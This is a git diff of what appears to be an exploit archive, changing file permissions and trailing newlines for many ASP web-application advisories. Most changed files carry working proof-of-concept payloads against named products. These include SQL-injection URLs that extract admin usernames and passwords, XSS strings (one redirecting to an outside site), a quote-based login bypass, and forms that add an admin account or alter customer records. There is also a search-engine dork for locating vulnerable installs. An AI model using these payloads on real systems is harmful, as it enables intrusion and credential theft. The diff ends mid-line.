System 1.2 is vulnerable; other versions may also be vulnerable. -<form action="http://www.example.com/repair/pwd/sentout.asp" method="post"> user: <input type="text" name="pID" value="adm2"><br> pass: <input type="text" name="Pwd" value="123456"> <input type="hidden" name="pFrom" value="N/A"> <input type="hidden" name="pName" value="N/A"> <input type="hidden" name="pTag" value="z,repair,leader"> <input type="submit" value="add"> </form> \ No newline at end of file +<form action="http://www.example.com/repair/pwd/sentout.asp" method="post"> user: <input type="text" name="pID" value="adm2"><br> pass: <input type="text" name="Pwd" value="123456"> <input type="hidden" name="pFrom" value="N/A"> <input type="hidden" name="pName" value="N/A"> <input type="hidden" name="pTag" value="z,repair,leader"> <input type="submit" value="add"> </form> \ No newline at end of file diff --git a/platforms/asp/webapps/31859.txt b/platforms/asp/webapps/31859.txt old mode 100755 new mode 100644 index db8c32cfe..d1f79d553 --- a/platforms/asp/webapps/31859.txt +++ b/platforms/asp/webapps/31859.txt @@ -9,4 +9,4 @@ JustPORTAL 1.0 is vulnerable; other versions may also be affected. http://www.example.com/lab/JustPORTALv1.0/panel/videogit.asp?site=1+union+select+0,(sifre),kullaniciadi,3,4,5+from+uyeler http://www.example.com/lab/JustPORTALv1.0/panel/resimgit.asp?site=1+union+select+0,sifre,kullaniciadi,3,4+from+uyeler http://www.example.com/lab/JustPORTALv1.0/panel/menugit.asp?site=1+union+select+0,sifre,kullaniciadi+from+uyeler -http://www.example.com/lab/JustPORTALv1.0/panel/habergit.asp?site=1+union+select+0,sifre,kullaniciadi,3,4+from+uyeler \ No newline at end of file +http://www.example.com/lab/JustPORTALv1.0/panel/habergit.asp?site=1+union+select+0,sifre,kullaniciadi,3,4+from+uyeler \ No newline at end of file diff --git a/platforms/asp/webapps/3186.txt b/platforms/asp/webapps/3186.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/31860.txt b/platforms/asp/webapps/31860.txt old mode 100755 new mode 100644 index ee7975770..2e83baa68 --- a/platforms/asp/webapps/31860.txt +++ b/platforms/asp/webapps/31860.txt @@ -24,4 +24,4 @@ http://www.example.com/portal/yonetici/video.asp?islem=videokategorisiduzenle&id http://www.example.com/portal/yonetici/video.asp?islem=videokategorisiduzenle&id=1+union+select+0,kadi+from+uyeler http://www.example.com/portal/yonetici/yazi.asp?islem=yazialtkategoriduzenle&id=1+union+select+0,sifre,2,3+from+uyeler http://www.example.com/portal/yonetici/yazi.asp?islem=yazialtkategoriduzenle&id=1+union+select+0,kadi,2,3+from+uyeler -http://www.example.com/portal/yonetici/uyeler.asp?islem=uyebilgi&id=1+union+select+0,1,2,3,4,sifre,kadi,7,8,1,1,1,1,1,1,9,1,0,1,1,1,1,1,1+from+uyeler \ No newline at end of file +http://www.example.com/portal/yonetici/uyeler.asp?islem=uyebilgi&id=1+union+select+0,1,2,3,4,sifre,kadi,7,8,1,1,1,1,1,1,9,1,0,1,1,1,1,1,1+from+uyeler \ No newline at end of file diff --git a/platforms/asp/webapps/31861.txt b/platforms/asp/webapps/31861.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/31865.txt b/platforms/asp/webapps/31865.txt old mode 100755 new mode 100644 index e8b6fd012..3675da807 --- a/platforms/asp/webapps/31865.txt +++ b/platforms/asp/webapps/31865.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow DotNetNuke 4.8.3 is vulnerable; other versions may also be affected. -http://www.example.com/Default.aspx/"onmouseover="x='al';x=x+'ert(/Soroush Dalili From WWW.BugReport.IR/)';eval(x);alert().aspx http://www.example.com/Default.aspx/bugreport/"onmouseover="var a='.aspx?';document.location='http://www.bugreport.ir/?archive'; \ No newline at end of file +http://www.example.com/Default.aspx/"onmouseover="x='al';x=x+'ert(/Soroush Dalili From WWW.BugReport.IR/)';eval(x);alert().aspx http://www.example.com/Default.aspx/bugreport/"onmouseover="var a='.aspx?';document.location='http://www.bugreport.ir/?archive'; \ No newline at end of file diff --git a/platforms/asp/webapps/31869.txt b/platforms/asp/webapps/31869.txt old mode 100755 new mode 100644 index 137e7893a..53b82d77e --- a/platforms/asp/webapps/31869.txt +++ b/platforms/asp/webapps/31869.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc i-pos Storefront 1.3 Beta is vulnerable; other versions may also be affected. -http://www.example.com/path/index.asp?item=-50+union+select+0,adminid,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+settings \ No newline at end of file +http://www.example.com/path/index.asp?item=-50+union+select+0,adminid,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+settings \ No newline at end of file diff --git a/platforms/asp/webapps/3187.txt b/platforms/asp/webapps/3187.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/31871.txt b/platforms/asp/webapps/31871.txt old mode 100755 new mode 100644 index e7aaa4951..469054d1f --- a/platforms/asp/webapps/31871.txt +++ b/platforms/asp/webapps/31871.txt @@ -10,4 +10,4 @@ http://www.example.com/tecard/admin/card.asp?gorev=duzenle&id=99999+union+select http://www.example.com/lab/tecard/admin/midi.asp?gorev=duzenle&id=1+union+select+0,1,kullanici_adi,3,4,sifre+from+editor http://www.example.com/lab/tecard/admin/cat.asp?gorev=duzenle&id=1+union+select+kullanici_adi,1,sifre,3,4,5+from+editor http://www.example.com/lab/tecard/admin/fon.asp?gorev=duzenle&id=1+union+select+0,sifre,2+from+editor -http://www.example.com/lab/tecard/admin/fon.asp?gorev=duzenle&id=1+union+select+0,kullanici_adi,2+from+editor \ No newline at end of file +http://www.example.com/lab/tecard/admin/fon.asp?gorev=duzenle&id=1+union+select+0,kullanici_adi,2+from+editor \ No newline at end of file diff --git a/platforms/asp/webapps/31891.txt b/platforms/asp/webapps/31891.txt old mode 100755 new mode 100644 index b810f3620..e2989728e --- a/platforms/asp/webapps/31891.txt +++ b/platforms/asp/webapps/31891.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to steal cookie-based authentica Real Estate Website 1.0 is vulnerable; other versions may also be affected. -http://www.example.com/PATH/location.asp?name="><script>alert('JosS')</script> http://www.example.com/PATH/location.asp?name=JosS&location=IIF((select%20mid(last(Name),1,1)%20from%20(select%20top%2010%20Namee%20from%20MSysObjects))='a',0,'done')%00 \ No newline at end of file +http://www.example.com/PATH/location.asp?name="><script>alert('JosS')</script> http://www.example.com/PATH/location.asp?name=JosS&location=IIF((select%20mid(last(Name),1,1)%20from%20(select%20top%2010%20Namee%20from%20MSysObjects))='a',0,'done')%00 \ No newline at end of file diff --git a/platforms/asp/webapps/3194.txt b/platforms/asp/webapps/3194.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/3195.txt b/platforms/asp/webapps/3195.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/31967.txt b/platforms/asp/webapps/31967.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/3197.txt b/platforms/asp/webapps/3197.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/3210.txt b/platforms/asp/webapps/3210.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/32111.txt b/platforms/asp/webapps/32111.txt old mode 100755 new mode 100644 index dfe425a6f..9f7bb51e9 --- a/platforms/asp/webapps/32111.txt +++ b/platforms/asp/webapps/32111.txt @@ -4,4 +4,4 @@ Pre Survey Generator is prone to an SQL-injection vulnerability because it fails A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/poll/default.asp?catid=1+union+select+0,password+from+users \ No newline at end of file +http://www.example.com/poll/default.asp?catid=1+union+select+0,password+from+users \ No newline at end of file diff --git a/platforms/asp/webapps/32119.txt b/platforms/asp/webapps/32119.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/32120.txt b/platforms/asp/webapps/32120.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/32157.txt b/platforms/asp/webapps/32157.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/32184.txt b/platforms/asp/webapps/32184.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/32185.txt b/platforms/asp/webapps/32185.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/32212.txt b/platforms/asp/webapps/32212.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/32255.txt b/platforms/asp/webapps/32255.txt old mode 100755 new mode 100644 index 132a56098..6f751e1b3 --- a/platforms/asp/webapps/32255.txt +++ b/platforms/asp/webapps/32255.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc fipsCMS 2.1 is vulnerable; other versions may also be affected. -http://www.example.com/fipsCMS/forum/neu.asp?kat=1+union+select+0,pw_admin+from+config \ No newline at end of file +http://www.example.com/fipsCMS/forum/neu.asp?kat=1+union+select+0,pw_admin+from+config \ No newline at end of file diff --git a/platforms/asp/webapps/32278.txt b/platforms/asp/webapps/32278.txt old mode 100755 new mode 100644 index 7b79227a6..370adad31 --- a/platforms/asp/webapps/32278.txt +++ b/platforms/asp/webapps/32278.txt @@ -5,4 +5,4 @@ K Web CMS is prone to an SQL-injection vulnerability because it fails to suffici Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/sayfala.asp?id=96+union+select+1,2,3,4,5,user_name,7+from+admin -http://www.example.com/sayfala.asp?id=96+union+select+1,2,3,4,5,pass,7+from+admin \ No newline at end of file +http://www.example.com/sayfala.asp?id=96+union+select+1,2,3,4,5,pass,7+from+admin \ No newline at end of file diff --git a/platforms/asp/webapps/32297.txt b/platforms/asp/webapps/32297.txt old mode 100755 new mode 100644 index 86d503a2a..69d5c81c6 --- a/platforms/asp/webapps/32297.txt +++ b/platforms/asp/webapps/32297.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Smart Survey 1.0 is vulnerable; other versions may also be affected. -http://www.example.com/surveyresults.asp?folder=/123adminxyz/SmartSurve/&title=example.com&sid=[XSS] \ No newline at end of file +http://www.example.com/surveyresults.asp?folder=/123adminxyz/SmartSurve/&title=example.com&sid=[XSS] \ No newline at end of file diff --git a/platforms/asp/webapps/32300.txt b/platforms/asp/webapps/32300.txt old mode 100755 new mode 100644 index 87b4b4c1e..842e8e11d --- a/platforms/asp/webapps/32300.txt +++ b/platforms/asp/webapps/32300.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow ASP Search Engine 1.5.6 is vulnerable; other versions may also be affected. -http://www.example.com/resource/searchdemo/search.asp?look_for="><script>alert("JoCk3r")</script> \ No newline at end of file +http://www.example.com/resource/searchdemo/search.asp?look_for="><script>alert("JoCk3r")</script> \ No newline at end of file diff --git a/platforms/asp/webapps/3233.txt b/platforms/asp/webapps/3233.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/32394.txt b/platforms/asp/webapps/32394.txt old mode 100755 new mode 100644 index e97f1ea13..fa2f5f00c --- a/platforms/asp/webapps/32394.txt +++ b/platforms/asp/webapps/32394.txt @@ -4,4 +4,4 @@ Sama Educational Management System is prone to a cross-site scripting vulnerabil An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/Error.asp?Message=XSS \ No newline at end of file +http://www.example.com/Error.asp?Message=XSS \ No newline at end of file diff --git a/platforms/asp/webapps/32401.txt b/platforms/asp/webapps/32401.txt old mode 100755 new mode 100644 index fd6e269fb..fabcb0f3e --- a/platforms/asp/webapps/32401.txt +++ b/platforms/asp/webapps/32401.txt @@ -8,4 +8,4 @@ rgb72 WCMS 1.0b is vulnerable; other versions may also be affected. http://www.example.com/[path]/news_detail.asp?id=1+union+select+1,2,3,f_user,f_password,6,7,8+from+upass%00 -http://www.example.com/[path]/news_detail.asp?id=1+union+select+1,2,f_user,4,5,f_password,7,8,9,10,11,12,13+from+upass%00 \ No newline at end of file +http://www.example.com/[path]/news_detail.asp?id=1+union+select+1,2,f_user,4,5,f_password,7,8,9,10,11,12,13+from+upass%00 \ No newline at end of file diff --git a/platforms/asp/webapps/3241.txt b/platforms/asp/webapps/3241.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/32412.txt b/platforms/asp/webapps/32412.txt old mode 100755 new mode 100644 index 5ba6a1164..59ff05b98 --- a/platforms/asp/webapps/32412.txt +++ b/platforms/asp/webapps/32412.txt @@ -8,4 +8,4 @@ Exploiting the issue may allow the attacker to obtain sensitive information that Omnicom Content Platform 2.0 is vulnerable; other versions may also be affected. -http://www.example.com/ocp/admin/fileKontrola/browser.asp?root=/ \ No newline at end of file +http://www.example.com/ocp/admin/fileKontrola/browser.asp?root=/ \ No newline at end of file diff --git a/platforms/asp/webapps/32485.txt b/platforms/asp/webapps/32485.txt old mode 100755 new mode 100644 index 67284b78d..96d504125 --- a/platforms/asp/webapps/32485.txt +++ b/platforms/asp/webapps/32485.txt @@ -4,4 +4,4 @@ ASP Indir Iltaweb Alisveris Sistemi is prone to an SQL-injection vulnerability b A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/urunler.asp?catno=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 from users \ No newline at end of file +http://www.example.com/urunler.asp?catno=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 from users \ No newline at end of file diff --git a/platforms/asp/webapps/32498.txt b/platforms/asp/webapps/32498.txt old mode 100755 new mode 100644 index fac30d7dd..241e46bea --- a/platforms/asp/webapps/32498.txt +++ b/platforms/asp/webapps/32498.txt @@ -4,4 +4,4 @@ Dizi Portali is prone to an SQL-injection vulnerability because it fails to suff Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/path/diziler.asp?id=[Sql Injection] \ No newline at end of file +http://www.example.com/path/diziler.asp?id=[Sql Injection] \ No newline at end of file diff --git a/platforms/asp/webapps/32500.txt b/platforms/asp/webapps/32500.txt old mode 100755 new mode 100644 index e0db9a8dd..976e78e0f --- a/platforms/asp/webapps/32500.txt +++ b/platforms/asp/webapps/32500.txt @@ -6,4 +6,4 @@ A successful exploit may allow an attacker to compromise the application, access Bahar Download Script 2.0 is vulnerable; other versions may also be affected. -http://www.example.com/path/aspkat.asp?kid=-2%20union%20select%200,kullanici,parola,3,4,5,6,7,8,9,10,11,12,13,14,15,16%20from%20admin%20where%20id=1 \ No newline at end of file +http://www.example.com/path/aspkat.asp?kid=-2%20union%20select%200,kullanici,parola,3,4,5,6,7,8,9,10,11,12,13,14,15,16%20from%20admin%20where%20id=1 \ No newline at end of file diff --git a/platforms/asp/webapps/32549.txt b/platforms/asp/webapps/32549.txt old mode 100755 new mode 100644 index 148379dfe..4e5b7b1a3 --- a/platforms/asp/webapps/32549.txt +++ b/platforms/asp/webapps/32549.txt @@ -4,4 +4,4 @@ Dorsa CMS is prone to a cross-site scripting vulnerability because it fails to s An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/Default_.aspx?lang=1&sub=5&Page_=search&order=search&search=%27%3E%3Cscript%3Ealert%28%27Pouya_Server%27%29%3C%2Fscript%3E \ No newline at end of file +http://www.example.com/Default_.aspx?lang=1&sub=5&Page_=search&order=search&search=%27%3E%3Cscript%3Ealert%28%27Pouya_Server%27%29%3C%2Fscript%3E \ No newline at end of file diff --git a/platforms/asp/webapps/32577.txt b/platforms/asp/webapps/32577.txt old mode 100755 new mode 100644 index 249550a54..d7b6f983e --- a/platforms/asp/webapps/32577.txt +++ b/platforms/asp/webapps/32577.txt @@ -4,4 +4,4 @@ Dizi Portali is prone to an SQL-injection vulnerability because it fails to suff Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/film.asp?film=1+union+select+0,1,sifre,3,4,5+from+ayarlar \ No newline at end of file +http://www.example.com/film.asp?film=1+union+select+0,1,sifre,3,4,5+from+ayarlar \ No newline at end of file diff --git a/platforms/asp/webapps/32580.txt b/platforms/asp/webapps/32580.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/32601.txt b/platforms/asp/webapps/32601.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/32602.txt b/platforms/asp/webapps/32602.txt old mode 100755 new mode 100644 index 21cdc95c0..85af1994e --- a/platforms/asp/webapps/32602.txt +++ b/platforms/asp/webapps/32602.txt @@ -9,4 +9,4 @@ The following applications are vulnerable: Ocean12 FAQ Manager Pro Ocean12 Poll Manager Pro -http://www.example.com/login.asp?Admin_ID=[SQL]&Password=pass \ No newline at end of file +http://www.example.com/login.asp?Admin_ID=[SQL]&Password=pass \ No newline at end of file diff --git a/platforms/asp/webapps/32603.txt b/platforms/asp/webapps/32603.txt old mode 100755 new mode 100644 index ce1aa199f..3d09d8705 --- a/platforms/asp/webapps/32603.txt +++ b/platforms/asp/webapps/32603.txt @@ -6,4 +6,4 @@ A successful exploit may allow an attacker to compromise the application, access Ocean12 Mailing List Manager Gold 2.04 is vulnerable; other versions may also be affected. -http://www.example.com/default.asp?Page=2&Email=[SQL]&Password=pass&Password2=pass&FirstName=name&LastName=lastname&MailType=0 \ No newline at end of file +http://www.example.com/default.asp?Page=2&Email=[SQL]&Password=pass&Password2=pass&FirstName=name&LastName=lastname&MailType=0 \ No newline at end of file diff --git a/platforms/asp/webapps/32604.txt b/platforms/asp/webapps/32604.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/32609.txt b/platforms/asp/webapps/32609.txt old mode 100755 new mode 100644 index 7a67a5054..bae427db8 --- a/platforms/asp/webapps/32609.txt +++ b/platforms/asp/webapps/32609.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc All versions are considered vulnerable. -http://www.example.com/[Path]/home/detailad.asp?siteid=[SQL] \ No newline at end of file +http://www.example.com/[Path]/home/detailad.asp?siteid=[SQL] \ No newline at end of file diff --git a/platforms/asp/webapps/32610.txt b/platforms/asp/webapps/32610.txt old mode 100755 new mode 100644 index 74279fcc9..3939da9fd --- a/platforms/asp/webapps/32610.txt +++ b/platforms/asp/webapps/32610.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow All versions are considered vulnerable. -http://www.example.com/[Path]/home/signup.asp?full_name=pouya.s3rver@gmail.com&email=111-222-1933email@address.tst&pass=111-222-1933email@address.tst&address=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&phone=111-222-1933email@address.com&state=0&hide_email=on&url_add=111-222-1933email@address.tst&Submit=SignUp&addit=start \ No newline at end of file +http://www.example.com/[Path]/home/signup.asp?full_name=pouya.s3rver@gmail.com&email=111-222-1933email@address.tst&pass=111-222-1933email@address.tst&address=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&phone=111-222-1933email@address.com&state=0&hide_email=on&url_add=111-222-1933email@address.tst&Submit=SignUp&addit=start \ No newline at end of file diff --git a/platforms/asp/webapps/32611.txt b/platforms/asp/webapps/32611.txt old mode 100755 new mode 100644 index 166b9509d..dcc83ed75 --- a/platforms/asp/webapps/32611.txt +++ b/platforms/asp/webapps/32611.txt @@ -4,4 +4,4 @@ CodeToad ASP Shopping Cart Script is prone to a cross-site scripting vulnerabili An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/?>"'><ScRiPt>alert(1369)</ScRiPt> \ No newline at end of file +http://www.example.com/?>"'><ScRiPt>alert(1369)</ScRiPt> \ No newline at end of file diff --git a/platforms/asp/webapps/32626.txt b/platforms/asp/webapps/32626.txt old mode 100755 new mode 100644 index 01eb2c86e..fffc4e49f --- a/platforms/asp/webapps/32626.txt +++ b/platforms/asp/webapps/32626.txt @@ -4,4 +4,4 @@ ASP Forum Script is prone to an SQL-injection vulnerability and multiple cross-s Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/[Path]/messages.asp?forum_id=3&message_id=[SQL] \ No newline at end of file +http://www.example.com/[Path]/messages.asp?forum_id=3&message_id=[SQL] \ No newline at end of file diff --git a/platforms/asp/webapps/32628.txt b/platforms/asp/webapps/32628.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/32629.txt b/platforms/asp/webapps/32629.txt old mode 100755 new mode 100644 index e7fc4fa5f..939ca6694 --- a/platforms/asp/webapps/32629.txt +++ b/platforms/asp/webapps/32629.txt @@ -4,4 +4,4 @@ ASP Forum Script is prone to an SQL-injection vulnerability and multiple cross-s Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/[Path]/default.asp?>"'><ScRiPt>alert(1369)</ScRiPt> \ No newline at end of file +http://www.example.com/[Path]/default.asp?>"'><ScRiPt>alert(1369)</ScRiPt> \ No newline at end of file diff --git a/platforms/asp/webapps/32630.txt b/platforms/asp/webapps/32630.txt old mode 100755 new mode 100644 index 4ba91034e..7fbf51cce --- a/platforms/asp/webapps/32630.txt +++ b/platforms/asp/webapps/32630.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow All versions are considered vulnerable. -http://www.example.com/[Path]/Employee/emp_login.asp?msg=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%281369%29%3B%22%3E \ No newline at end of file +http://www.example.com/[Path]/Employee/emp_login.asp?msg=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%281369%29%3B%22%3E \ No newline at end of file diff --git a/platforms/asp/webapps/32635.txt b/platforms/asp/webapps/32635.txt old mode 100755 new mode 100644 index 713d7897c..a66905f2f --- a/platforms/asp/webapps/32635.txt +++ b/platforms/asp/webapps/32635.txt @@ -7,4 +7,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc The following example input is available: User:admin -pass:' or ' \ No newline at end of file +pass:' or ' \ No newline at end of file diff --git a/platforms/asp/webapps/32653.txt b/platforms/asp/webapps/32653.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/32658.txt b/platforms/asp/webapps/32658.txt old mode 100755 new mode 100644 index 759622eb5..078054866 --- a/platforms/asp/webapps/32658.txt +++ b/platforms/asp/webapps/32658.txt @@ -4,4 +4,4 @@ ASP-DEV XM Events Diary is prone to an SQL-injection vulnerability because it fa Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/[path]/default.asp?cat=[SQL] \ No newline at end of file +http://www.example.com/[path]/default.asp?cat=[SQL] \ No newline at end of file diff --git a/platforms/asp/webapps/32660.txt b/platforms/asp/webapps/32660.txt old mode 100755 new mode 100644 index 3df221e23..c6d2f2da1 --- a/platforms/asp/webapps/32660.txt +++ b/platforms/asp/webapps/32660.txt @@ -7,8 +7,4 @@ [+] Tested on: Windows 7 and Linux [+] Vulnerable File: default.asp [+} Dork : intext:"Powered by CIS Manager" -[+] Exploit : http://host/site/default.asp?TroncoID=[SQL Injection] - - - - \ No newline at end of file +[+] Exploit : http://host/site/default.asp?TroncoID=[SQL Injection] \ No newline at end of file diff --git a/platforms/asp/webapps/32683.txt b/platforms/asp/webapps/32683.txt old mode 100755 new mode 100644 index d723d363f..417dfce67 --- a/platforms/asp/webapps/32683.txt +++ b/platforms/asp/webapps/32683.txt @@ -4,4 +4,4 @@ Mavi Emlak is prone to an SQL-injection vulnerability because it fails to proper Attackers may exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/newDetail.asp?haberNo=-9999%20union%20select%200,username,password,3,4,5%20from%20Danismanlar \ No newline at end of file +http://www.example.com/newDetail.asp?haberNo=-9999%20union%20select%200,username,password,3,4,5%20from%20Danismanlar \ No newline at end of file diff --git a/platforms/asp/webapps/32687.txt b/platforms/asp/webapps/32687.txt old mode 100755 new mode 100644 index 26258cdca..55e80f3ca --- a/platforms/asp/webapps/32687.txt +++ b/platforms/asp/webapps/32687.txt @@ -6,4 +6,4 @@ Attackers may exploit this issue to compromise the application, access or modify http://www.example.com/[path]/haber.asp?haber=-999'%20union%20select%200,1,ad,3,4%20from%20Kullanici%20where%20'1 -http://www.example.com/[path]/haber.asp?haber=-999'%20union%20select%200,1,sifre,3,4%20from%20Kullanici%20where%20'1 \ No newline at end of file +http://www.example.com/[path]/haber.asp?haber=-999'%20union%20select%200,1,sifre,3,4%20from%20Kullanici%20where%20'1 \ No newline at end of file diff --git a/platforms/asp/webapps/32716.html b/platforms/asp/webapps/32716.html old mode 100755 new mode 100644 index fce63ec45..02d0a1b7b --- a/platforms/asp/webapps/32716.html +++ b/platforms/asp/webapps/32716.html @@ -6,4 +6,4 @@ An attacker can exploit this issue to gain unauthorized access to the affected a Comersus Cart 6 is vulnerable; other versions may also be affected. -<form method="post" name="modCust" action="http://target/[path]/comersus_customerModifyExec.asp"> <table width="421" border="0"> <tr> </tr> <tr> <td width="168">Name</td> <td width="220"> <input type=text name=customerName value="test"> </td> </tr> <tr> <td width="168">Last Name</td> <td width="220"> <input type=text name=lastName value="test"> </td> </tr> <tr> <td width="168">Company</td> <td width="220"> <input type=text name=customerCompany value="test"> </td> </tr> <tr> <td width="168">Phone</td> <td width="220"> <input type=text name=phone value="123456789"> </td> </tr> <tr> <td width="168"><strong>Email</strong></td> <td width="220"> <input type="text" name="email" value="Please Add Mail"> Edit </td> </tr> <tr> <td width="168"><strong>Password</strong></td> <td width="220"> <input type=text name=password value="Please Add Pass"> Edit </td> </tr> <tr> <td width="168">Address</td> <td width="220"> <input type=text name=address value="test"> </td> </tr> <tr> <td width="168">Zip</td> <td width="220"> <input type=text name=zip value="08050"> </td> </tr> <tr> <td width="168">State</td> <td width="220"> <SELECT name=stateCode size=1> <OPTION value="">Select the state <option value="1">Please Type County below </OPTION> </SELECT> </td> </tr> <tr> <td width="168">Non listed state</td> <td width="220"> <input type=text name=state value=""> </td> </tr> <tr> <td width="168">City</td> <td width="220"> <input type=text name=city value="test"> </td> </tr> <tr> <td width="168">Country</td> <td width="220"> <SELECT name=countryCode> <OPTION value="">Select the country <option value="AF" selected>AFGHANISTAN </OPTION> </SELECT> </td> </tr> <tr> <td width="168">&nbsp;</td> <td width="220">&nbsp;</td> </tr> <tr> <td colspan="2"> <input type="submit" name="Modify" value="Modify"> </td> </tr> </table> </form> \ No newline at end of file +<form method="post" name="modCust" action="http://target/[path]/comersus_customerModifyExec.asp"> <table width="421" border="0"> <tr> </tr> <tr> <td width="168">Name</td> <td width="220"> <input type=text name=customerName value="test"> </td> </tr> <tr> <td width="168">Last Name</td> <td width="220"> <input type=text name=lastName value="test"> </td> </tr> <tr> <td width="168">Company</td> <td width="220"> <input type=text name=customerCompany value="test"> </td> </tr> <tr> <td width="168">Phone</td> <td width="220"> <input type=text name=phone value="123456789"> </td> </tr> <tr> <td width="168"><strong>Email</strong></td> <td width="220"> <input type="text" name="email" value="Please Add Mail"> Edit </td> </tr> <tr> <td width="168"><strong>Password</strong></td> <td width="220"> <input type=text name=password value="Please Add Pass"> Edit </td> </tr> <tr> <td width="168">Address</td> <td width="220"> <input type=text name=address value="test"> </td> </tr> <tr> <td width="168">Zip</td> <td width="220"> <input type=text name=zip value="08050"> </td> </tr> <tr> <td width="168">State</td> <td width="220"> <SELECT name=stateCode size=1> <OPTION value="">Select the state <option value="1">Please Type County below </OPTION> </SELECT> </td> </tr> <tr> <td width="168">Non listed state</td> <td width="220"> <input type=text name=state value=""> </td> </tr> <tr> <td width="168">City</td> <td width="220"> <input type=text name=city value="test"> </td> </tr> <tr> <td width="168">Country</td> <td width="220"> <SELECT name=countryCode> <OPTION value="">Select the country <option value="AF" selected>AFGHANISTAN </OPTION> </SELECT> </td> </tr> <tr> <td width="168">&nbsp;</td> <td width="220">&nbsp;</td> </tr> <tr> <td colspan="2"> <input type="submit" name="Modify" value="Modify"> </td> </tr> </table> </form> \ No newline at end of file diff --git a/platforms/asp/webapps/32729.txt b/platforms/asp/webapps/32729.txt old mode 100755 new mode 100644 index 58d7e623f..34412d1fe --- a/platforms/asp/webapps/32729.txt +++ b/platforms/asp/webapps/32729.txt @@ -4,4 +4,4 @@ LinksPro is prone to an SQL-injection vulnerability because it fails to sufficie Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/[Path]/default.asp?QS=True&OrderDirection='[SQL]&OrderField=codefixerlp_tblLink_flddateadded \ No newline at end of file +http://www.example.com/[Path]/default.asp?QS=True&OrderDirection='[SQL]&OrderField=codefixerlp_tblLink_flddateadded \ No newline at end of file diff --git a/platforms/asp/webapps/32730.txt b/platforms/asp/webapps/32730.txt old mode 100755 new mode 100644 index cef735c46..d8855a826 --- a/platforms/asp/webapps/32730.txt +++ b/platforms/asp/webapps/32730.txt @@ -7,4 +7,4 @@ Exploiting these issues could allow an attacker to steal cookie-based authentica http://www.example.com/[Path]/search.asp?search=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>&submit=%3E -http://www.example.com/[Path]/search.asp?search=>"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&submit=%3E \ No newline at end of file +http://www.example.com/[Path]/search.asp?search=>"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&submit=%3E \ No newline at end of file diff --git a/platforms/asp/webapps/32731.txt b/platforms/asp/webapps/32731.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/32735.txt b/platforms/asp/webapps/32735.txt old mode 100755 new mode 100644 diff --git 